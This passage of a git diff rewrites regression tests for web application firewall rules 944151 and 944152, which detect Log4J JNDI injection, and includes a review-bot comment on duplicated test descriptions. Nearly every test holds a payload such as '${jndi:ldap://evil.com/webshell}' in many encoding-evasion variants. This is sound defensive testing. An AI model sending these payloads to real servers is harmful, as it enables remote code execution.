POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 14 desc: Log4J exploit on JSON with numeric 
HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-17 + - input: + dest_addr: "127.0.0.1" + 
headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL 
encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-22 + - input: + 
dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: 
"*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index e88f83f63..f1509f20d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml 
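Review bot: Several tests in the rewritten 944151.yaml carry identical `desc:` values although their payloads differ — tests 3 and 4 are both "Log4J exploit in XML code", and tests 5, 6, 7 and 25 are all "Log4J exploit on arg foo, with evasion" — so a go-ftw failure report for any of them no longer tells the reader which variant regressed. Since the file is rewritten end to end anyway, give each a distinguishing description, e.g. `desc: Log4J exploit on arg foo, with env default-value evasion` for test 5 and `desc: Log4J exploit on arg foo, with per-character lookup evasion` for test 6. The `data:` of test 3 also appears empty in this view; a bare `data:` parses as YAML null, so if the XML body was really dropped rather than stripped by rendering, that test sends no payload and cannot exercise the rule. The same duplicated descriptions are carried over unchanged in the sibling 944150.yaml and 944152.yaml hunks of this diff.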
@@ -1,474 +1,472 @@ --- -# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. -# 944152 should detect the same things as 944152 and 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944151.yaml. +# 944152 should detect the same things as 944150 and 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944152.yaml" - description: "Description" +rule_id: 944152 tests: - - test_title: 944152-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - 
port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: 
application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: 
'{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 14 desc: Log4J exploit on JSON 
with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-17 + - input: + dest_addr: 
"127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion 
wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-22 
